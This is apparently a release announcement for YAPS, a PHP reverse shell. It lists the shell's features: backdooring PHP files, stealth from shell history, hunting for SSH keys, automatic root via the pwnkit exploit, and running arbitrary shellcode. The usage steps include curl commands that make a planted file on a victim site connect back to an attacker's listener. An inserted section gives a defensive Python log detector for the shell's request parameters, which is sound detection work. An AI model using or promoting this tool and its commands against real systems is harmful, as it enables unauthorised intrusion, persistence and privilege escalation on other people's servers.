YAPS v1.5 releases: Yet Another PHP Shell

PHP reverse shell

YAPS – Yet Another PHP Shell

As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions, and you can control it via a simple netcat listener (nc -lp 1337).

In the current version, its main functions support only Linux systems, but I’m planning to make it work with Windows too.

Features

  • Single PHP file (no need to install packages, libs, or download tons of files)
  • Works with netcat, ncat, socat, multi/handler, almost any listener
  • Customizable password protection
  • No logs in .bash_history
  • Does some enumeration
    • Network info (interfaces, iptables rules, active ports)
    • User info
    • List SUID and SGID files
    • Search for SSH keys (public and private)
    • List crontab
    • List writable PHP files
  • Auto download LinPEAS, LinEnum or Linux Exploit Suggester
  • Write and run PHP code on remote host
  • (Semi) Stabilize shell
  • Duplicate connections
  • Auto update
  • Infect PHP files with backdoors
  • [NEW] Auto reverse root shell via pwnkit (CVE-2021-4034)

Cons

  • Connection isn’t encrypted (yet) (nc does not support SSL)
  • Not fully interactive (although you can spawn an interactive shell with !stabilize)
    • CTRL+C breaks it; can’t use arrows to navigate (unless you use rlwrap nc -lp <ip> <port>)

Usage

  1. Set up a TCP listener;
  2. Set your IP and port. This can be done by:
     • 2.1 Editing the variables at the start of the script;
     • 2.2 Setting them via web request (curl -X POST -d "x=ip&y=port" victim.com/yaps.php or curl victim.com/yaps.php?x=ip&y=port);
  3. Open yaps.php in the browser or curl it;
     • 3.1 You can set yaps.php?s or yaps.php?silent to suppress the banner
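Because the listener address is handed to the script as plain request parameters (x=ip, y=port) and the banner is suppressed with s or silent, those parameters land in the web server's access log. The following detector is an added example, not part of the YAPS project: it runs over constructed Apache combined-format log lines (sample addresses are documentation ranges, not real hosts) and flags PHP requests whose query string carries a valid IP in x= together with a TCP port in y=, or the s/silent switch.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2022:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Feb/2022:10:01:09 +0000] "GET /uploads/yaps.php?x=198.51.100.7&y=1337 HTTP/1.1" 200 88 "-" "curl/7.81.0"
203.0.113.5 - - [10/Feb/2022:10:02:15 +0000] "GET /uploads/yaps.php?silent HTTP/1.1" 200 0 "-" "curl/7.81.0"
198.51.100.9 - - [10/Feb/2022:10:03:00 +0000] "GET /shop.php?x=5&y=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def looks_like_callback(query: str) -> bool:
    """True if the query string carries an IP address in x= and a TCP port in y=."""
    params = parse_qs(query, keep_blank_values=True)
    if "x" not in params or "y" not in params:
        return False
    try:
        ipaddress.ip_address(params["x"][0])   # rejects x=5 and other non-addresses
        port = int(params["y"][0])
    except ValueError:
        return False
    return 1 <= port <= 65535

def scan_access_log(text: str) -> list:
    """Return (client, path, reason) tuples for requests matching the shell's control parameters."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(".php"):
            continue
        if looks_like_callback(parts.query):
            hits.append((m.group("client"), parts.path, "callback target set via x=/y="))
        elif parse_qs(parts.query, keep_blank_values=True).keys() & {"s", "silent"}:
            hits.append((m.group("client"), parts.path, "banner suppressed via s/silent"))
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit)
```

A POST body with the same parameters is not visible in a standard access log, so pair this with a file-integrity check on the web root or with mod_security-style request body logging.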

Working commands

!help – Display the help menu
!all-colors – Toggle all colors (compatible with colorless TTY)
!color – Toggle PS1 color (locally only, no environment variable is changed)
!enum – Download LinPEAS and LinEnum to /tmp and get them ready to use
!info – List information about the target (the enumeration mentioned above)
!stabilize – Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)
!passwd – Password option (enable, disable, set, modify)
!php – Write and run PHP on the remote host
!suggester – Download Linux Exploit Suggester to /tmp and get it ready to use

Changelog v1.5

  • Added !shellcode to receive and run an arbitrary shellcode
  • Improved duplicate() function (you can now specify a range of ports)
  • Changed function name from stabilize to interactive
  • Packed embedded code to save space
  • Fixed broken links
  • Prepend TERM=xterm to all commands
  • Minor improvements

Download

git clone https://github.com/Nickguitar/YAPS.git

Source: https://github.com/Nickguitar/